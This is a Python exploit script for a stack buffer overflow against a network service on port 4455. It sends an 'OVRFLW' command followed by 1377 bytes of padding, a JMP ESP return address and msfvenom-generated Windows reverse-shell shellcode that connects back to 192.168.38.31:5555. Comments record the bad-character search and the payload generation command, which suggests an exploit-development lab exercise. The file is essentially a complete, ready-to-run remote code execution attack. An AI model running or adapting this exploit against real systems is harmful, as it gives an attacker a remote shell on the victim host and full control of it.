#!/usr/bin/python

import sys, socket

if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <HOST>\n"
    sys.exit()

#\x00\x04\x3b\x47\x4a\xb0\xb9
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.38.31 LPORT=5555 -a x86 --platform windows -b "\x00\x04\x3b\x47\x4a\xb0\xb9" -f python

#Payload size: 348 bytes
#Final size of python file: 1672 bytes
buf =  ""
buf += "\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\x3d\x9b\x9a\x31\x83\xee\xfc\xe2\xf4\xc1\x73"
buf += "\x18\x31\x3d\x9b\xfa\xb8\xd8\xaa\x5a\x55\xb6\xcb\xaa"
buf += "\xba\x6f\x97\x11\x63\x29\x10\xe8\x19\x32\x2c\xd0\x17"
buf += "\x0c\x64\x36\x0d\x5c\xe7\x98\x1d\x1d\x5a\x55\x3c\x3c"
buf += "\x5c\x78\xc3\x6f\xcc\x11\x63\x2d\x10\xd0\x0d\xb6\xd7"
buf += "\x8b\x49\xde\xd3\x9b\xe0\x6c\x10\xc3\x11\x3c\x48\x11"
buf += "\x78\x25\x78\xa0\x78\xb6\xaf\x11\x30\xeb\xaa\x65\x9d"
buf += "\xfc\x54\x97\x30\xfa\xa3\x7a\x44\xcb\x98\xe7\xc9\x06"
buf += "\xe6\xbe\x44\xd9\xc3\x11\x69\x19\x9a\x49\x57\xb6\x97"
buf += "\xd1\xba\x65\x87\x9b\xe2\xb6\x9f\x11\x30\xed\x12\xde"
buf += "\x15\x19\xc0\xc1\x50\x64\xc1\xcb\xce\xdd\xc4\xc5\x6b"
buf += "\xb6\x89\x71\xbc\x60\xf3\xa9\x03\x3d\x9b\xf2\x46\x4e"
buf += "\xa9\xc5\x65\x55\xd7\xed\x17\x3a\x64\x4f\x89\xad\x9a"
buf += "\x9a\x31\x14\x5f\xce\x61\x55\xb2\x1a\x5a\x3d\x64\x4f"
buf += "\x61\x6d\xcb\xca\x71\x6d\xdb\xca\x59\xd7\x94\x45\xd1"
buf += "\xc2\x4e\x0d\x5b\x38\xf3\x5a\x99\x1b\x84\xf2\x33\x3d"
buf += "\x8e\x29\xb8\xdb\xf1\x8a\x67\x6a\xf3\x03\x94\x49\xfa"
buf += "\x65\xe4\xb8\x5b\xee\x3d\xc2\xd5\x92\x44\xd1\xf3\x6a"
buf += "\x84\x9f\xcd\x65\xe4\x55\xf8\xf7\x55\x3d\x12\x79\x66"
buf += "\x6a\xcc\xab\xc7\x57\x89\xc3\x67\xdf\x66\xfc\xf6\x79"
buf += "\xbf\xa6\x30\x3c\x16\xde\x15\x2d\x5d\x9a\x75\x69\xcb"
buf += "\xcc\x67\x6b\xdd\xcc\x7f\x6b\xcd\xc9\x67\x55\xe2\x56"
buf += "\x0e\xbb\x64\x4f\xb8\xdd\xd5\xcc\x77\xc2\xab\xf2\x39"
buf += "\xba\x86\xfa\xce\xe8\x20\x6a\x84\x9f\xcd\xf2\x97\xa8"
buf += "\x26\x07\xce\xe8\xa7\x9c\x4d\x37\x1b\x61\xd1\x48\x9e"
buf += "\x21\x76\x2e\xe9\xf5\x5b\x3d\xc8\x65\xe4"
#56526683   FFE4             JMP ESP
#badchar 255 chars
#print len(badchars)

cmd = "OVRFLW "
#junk = "\x41" * 3000
#junk = badchars + "\x41" *(1377-len(badchars)) + "\x42\x42\x42\x42" +  "\x43"*(3000-1377-4)
junk = "\x41" *1377 + "\x83\x66\x52\x56" +  buf + "\x90"*(3000-1377-len(buf))
end = "\r\n"

buffer = cmd + junk + end

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 4455))
s.send(buffer)
s.recv(1024)
s.close()